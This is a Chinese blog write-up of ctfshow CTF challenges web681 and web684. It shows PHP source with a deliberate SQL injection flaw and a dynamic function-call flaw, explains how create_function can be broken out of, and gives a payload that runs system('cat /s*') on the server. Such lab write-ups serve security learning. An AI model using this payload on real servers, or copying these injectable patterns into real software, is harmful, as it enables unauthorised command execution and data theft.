web681

原创 已于 2023-03-31 00:55:52 修改 · 168 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #数据库 #服务器

于 2023-03-30 22:31:42 首次发布
该文讨论了PHP中的命名空间使用,强调了函数调用的相对与绝对路径差异,并通过示例展示了`create_function`如何创建匿名函数,以及潜在的安全问题。文中提到通过特定payload可能触发命令执行漏洞。

 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-09-24 14:58:16
# @Last Modified by:   h1xa
# @Last Modified time: 2021-09-24 16:04:49
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include "common.php";

session_start();

if (isset($_POST["name"])){
  $name = str_replace("'", "", trim(waf($_POST["name"])));
  if (strlen($name) > 11){
    echo("<script>alert('name too long')</script>");
  }else{
    $sql = "select count(*) from ctfshow_users where username = '$name' or nickname = '$name'";
    echo $sql;
    $db = new db();
    $result = $db->select_one_array($sql);
    if ($result[0]){
      $_SESSION['hat'] = 'black';
      echo 'good job';
    }else{
    $_SESSION['hat'] = 'green';
    }
    header("Location: index.php");
  }

}

 

web683

web684:

 <?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
    show_source(__FILE__);
} else {
    $action('', $arg);
}

在PHP的命名空间默认为\,所有的函数和类都在\这个命名空间中,如果直接写函数名function_name()调用,
调用的时候其实相当于写了一个相对路径;而如果写\function_name() 这样调用函数,则其实是写了一个绝对路径。
如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。
 

create_function('$a','return 111')
等价于
function a($a){
    return 111;
}

create_function('$a','return 111;}phpinfo();//')
等价于
function a($a){
    return 111;}phpinfo();//
}

payload:/?action=%5ccreate_function&arg=}system("cat /s*");//

681web_HTML手机电脑网站_网页源码移动端前端js效果_H5模板_自适应css源码ui组件.zip
08-03
681web_HTML手机电脑网站_网页源码移动端前端js效果_H5模板_自适应css源码ui组件.zip》这个压缩包包含了构建现代响应式网站所需的诸多元素,旨在为开发者提供一套完整的HTML5模板,适用于手机和电脑平台。...
SQL注入篇5(sqlmap的使用Web201-210)
m0_72929232的博客
10-05 1144
这几个题在B站ctfshow上都有讲解。
ctf.show大赛原型(web680-681)
wanan的博客
08-31 441
ctf.show大赛原型(web680-681)
ctfshow 大赛原题 680-695
blowed的博客
06-26 1777
ctfshow 大赛原题
CTFShow-大赛原题改编(未完慢慢更)
paidx0
04-24 3065
文章目录web680web681web682web683web684 create_function()web685web686(无参RCE)姿势一 getallheaders()姿势二 get_defined_vars()姿势三 session_id()web687web688 escapeshellcmd()web689 ssrfmeweb690web691order by 的一个盲注小技巧web692web693web694web695web696web697web698web711web71
CTFSHOW web680-780(大赛原题)
qq_37561898的博客
01-29 4406
ctfshow CTF ctfshow大赛原题
CTFSHOW大赛原题篇(web680-web695)
羽的博客
02-23 3360
CTFSHOW大赛原题篇 web680 code=phpinfo(); 先看下disable_function,有一堆过滤。并且open_basedir做了目录限制。 r然后看下当前目录下的文件 code=var_dump(scandir(".")); 发现一个文件secret_you_never_know 直接访问就拿到flag了 。。。。。。(大无语) web681 登录的时候抓个包,比如我们传name=123会返回sql语句 select count(*) from ctfshow_users whe
ctfshow web入门 大赛原题 web680--web688
2301_81040377的博客
07-30 949
不能使用的函数是这些但是还是可以看文件的看根目录啥也没有看当前目录或者直接访问下载文件。
PHP在微服务中的配置中心
2509_93947720的博客
11-26 460
在微服务架构里,配置中心相当于所有服务的"指挥中心",把散落在各处的配置项统一收拢管理。而配置中心能让所有服务实时获取最新配置,就像给每个服务装了遥控器,改个参数值都不用重启服务。毕竟PHP天生适合快速迭代,加上配置中心的动态配置能力,简直是为业务频繁变动的场景量身定制的。不过要提醒的是,配置项命名必须规范。我们初期踩过坑,不同团队用不同的命名风格,有的用驼峰有的用下划线,查找配置时特别混乱。说到具体实践,我们团队现在把配置分为三类:静态配置写在代码里,环境配置交给配置中心,动态配置通过管理界面实时调整。
MySQL 教程(超详细,零基础可学、第一篇)
2509_94101649的博客
11-27 303
MySQL 是一个关系型数据库管理系统,由瑞典 MySQL AB 公司开发,目前属于 Oracle 公司。MySQL 是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。MySQL 是开源的,目前隶属于 Oracle 旗下产品。MySQL 支持大型的数据库。可以处理拥有上千万条记录的大型数据库。MySQL 使用标准的 SQL 数据语言形式。MySQL 可以运行于多个系统上,并且支持多种语言。
JienDa聊PHP:电商实战中主流PHP框架的协同策略与架构优化
最新发布
Jien Da官方博客
11-29 906
摘要 本报告探讨了在复杂电商系统中如何协同使用Laravel、Symfony和Yii三大PHP框架。电商系统具有业务复杂、高并发、快速迭代等特点,单一框架难以满足所有需求。报告分析了各框架的优势:Laravel适合快速开发前端和管理后台,Symfony适用于高并发核心交易服务,Yii则擅长高性能API和后台系统。提出了三种协同架构模式:主从混合式架构(以Laravel为主集成其他框架)、微服务异构架构和模块化单体架构,并提供了具体实施策略和代码示例。为技术团队提供了可行的框架协同方案,以优化电商系统架构。
6.Nginx服务器
2301_77138478的博客
11-26 496
摘要:本文介绍了Nginx服务器的安装与配置方法,重点讲解了虚拟主机和SSL/TLS配置。主要内容包括:1) 通过yum安装Nginx并启动服务;2) 基于名称和端口的虚拟主机配置,实现多站点服务;3) 使用OpenSSL生成自签名证书,配置HTTPS站点;4) 设置HTTP到HTTPS的重定向。文中提供了详细的命令操作和测试步骤,并配有配置截图和测试结果展示,帮助用户快速掌握Nginx的基本配置方法。
【HTML+CSS】使用HTML与后端技术连接数据库
2509_94088455的博客
11-29 462
HTML负责构建网页的骨架,提供用户交互的表单等元素。用户通过表单输入数据,并通过表单的提交(submit)事件将数据发送到后端。
同一个域名,如何添加多个网站?
博客之家
11-27 419
本文介绍了三种网站部署方法:1)子目录部署,适合路径清晰的项目;2)子域名绑定,适合独立性强的项目;3)Nginx反向代理,适合多语言混合项目。详细说明了每种方法的配置步骤:子目录部署需创建主站并上传项目到不同子目录;子域名绑定需先解析域名再分别建站;反向代理则需配置Nginx转发规则。文章推荐前两种方法更简单实用,并提供了具体操作示例和访问测试方法。
php 7.4 配置安装php-zbarcode扩展
牛奔的博客
11-26 292
不是 PHP 官方扩展(这是一个较旧的仓库,最后更新于多年前,但支持 PHP 5.x 到 7.x,包括 7.4。克隆后需检查兼容性并编译。(这个 fork 明确支持 PHP 7,并修复了部分崩溃 bug,适合 PHP 7.4 使用。我将使用进行编译安装扩展。
PHP代码覆盖率
2509_93935036的博客
11-26 263
先扯清楚啥叫代码覆盖率。在PHP里,这指标通常分几种:行覆盖率(哪些代码行被执行)、分支覆盖率(比如if-else两个分支是否都测到)、路径覆盖率(更复杂的逻辑组合)。有回我盯着报告发现个神奇现象:某个工具类覆盖率显示60%,点进去发现全是getter/setter方法拉低分数——这种时候就得理智点,别强迫症发作非要把简单属性访问器也全测一遍。覆盖率数据就像张热力图,哪块代码亮着红灯,哪块黑着没测试,一目了然。特别是用持续集成配置覆盖率门槛后,谁提交的代码要是把覆盖率拉低5%以上,流水线直接卡住不让合并。
速卖通商品详情接口(速卖通API系列)
2503_93443381的博客
11-28 278
速卖通开放平台为开发者提供了丰富的API接口,包括商品搜索、商品详情、订单管理、物流跟踪等功能。通过调用这些API,开发者可以获取速卖通的商品数据,并将其集成到自己的应用中。
PHP 微信支付v3官方SDK JSAPI版(详细)
weixin_42177572的博客
11-26 330
本文介绍了基于ThinkPHP5.1框架实现微信支付V3接口的完整流程。主要内容包括:1) 使用Composer安装微信支付SDK和Guzzle扩展;2) 配置微信支付参数,特别注意证书路径需添加"file://"前缀;3) 创建WxPay类处理密钥解析和客户端实例化;4) 实现JSAPI支付接口,包括订单处理、签名生成和回调验证;5) 提供回调解密类AesUtil处理支付结果通知。文章详细说明了从SDK安装到支付流程实现的各个环节,并包含关键代码示例,为开发者在ThinkPHP项目中集
Webman 可能是 PHP 最强框架没有之一
希望我的博客,能帮上你解决学习中工作中所遇到的问题
11-28 560
Webman是一款基于Workerman的高性能PHP框架,以其常驻内存架构带来10倍于传统框架的性能表现。作者通过实际案例展示了Webman的三大优势:极致性能(支持协程、低资源消耗)、简单易用(类似Laravel的语法)和功能全面(完善的路由、ORM等)。安装仅需Composer命令,开发示例演示了快速API搭建过程。特别适合需要处理高并发、实时应用或希望优化服务器资源的项目。虽然存在一定学习曲线,但其平衡了开发效率与运行性能的特点,使其成为作者心目中PHP最强框架。
修复iertutil.dll无法定位序数681问题
许多其他Windows组件和应用程序也会间接调用此DLL文件中的函数,因此一旦该文件受损或缺失,不仅会导致IE浏览器崩溃,还可能引发系统稳定性下降甚至某些依赖IE内核的应用程序(如Outlook Express、部分企业级Web应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值